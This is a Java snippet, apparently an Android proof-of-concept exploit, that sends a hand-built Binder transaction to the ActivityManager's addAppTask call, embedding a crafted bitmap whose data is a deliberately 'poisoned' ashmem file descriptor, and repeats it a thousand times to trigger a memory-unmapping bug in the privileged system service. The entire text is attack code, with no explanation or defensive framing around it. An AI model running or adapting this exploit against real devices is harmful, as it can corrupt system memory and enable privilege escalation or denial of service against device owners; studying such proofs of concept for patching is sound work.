final int UNMAP_REGION_SIZE = 0x2000000;
final int NUM_ITERATIONS = 1000;
for (int i=0; i<NUM_ITERATIONS; i++) {
    try {

        //Preparing the request and response parcels
        Parcel data = Parcel.obtain();
        Parcel reply = Parcel.obtain();
        data.writeInterfaceToken(IActivityManager.descriptor);
        IBinder token = (IBinder) this.getClass().getMethod("getActivityToken", null).invoke(this, null);
        data.writeStrongBinder(token);
        Intent intent = new Intent(Intent.ACTION_MAIN);
        intent.addCategory(Intent.CATEGORY_LAUNCHER);
        intent.setComponent(new ComponentName(this, MainActivity.class));
        intent.writeToParcel(data, 0);
        ActivityManager.TaskDescription description = new ActivityManager.TaskDescription();
        description.writeToParcel(data, 0);

        //Writing a raw bitmap to a parcel containing our poisoned ASHMEM fd
        data.writeInt(1); //isMutable
        data.writeInt(3); //kARGB_4444_SkColorType
        data.writeInt(1); //kOpaque_SkAlphaType
        data.writeInt(192); //width
        data.writeInt(192); //height
        data.writeInt(0x1000); //rowBytes
        data.writeInt(2); //density

        //Writing the blob itself
        MemoryFile mem = new MemoryFile("bitmap", UNMAP_REGION_SIZE);
        data.writeInt(2); //BLOB_ASHMEM_MUTABLE
        FileDescriptor fd = (FileDescriptor) mem.getClass().getMethod("getFileDescriptor", null).invoke(mem, null);
        Log.e("BitUnmap", "ashmem fd=" + fd.getClass().getMethod("getInt$", null).invoke(fd, null));
        data.writeFileDescriptor(fd);


        //Performing the raw transaction
        ActivityManager am = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
        Object nativeAm = Class.forName("android.app.ActivityManagerNative").getMethod("getDefault", null).invoke(null, null);
        Log.e("BitUnmap", "nativeAm=" + nativeAm);
        IBinder binder = ((IActivityManager) nativeAm).asBinder();
        int ADD_APP_TASK_TRANSACTION = IBinder.FIRST_CALL_TRANSACTION + 233;
        binder.transact(ADD_APP_TASK_TRANSACTION, data, reply, 0);
        reply.readException();
        int res = reply.readInt();
        data.recycle();
        reply.recycle();
        Log.e("BitUnmap", "res=" + res);
        mem.close();
    } catch (Exception ex) {
        Log.e("BitUnmap", "ohnoez", ex);
    }
}
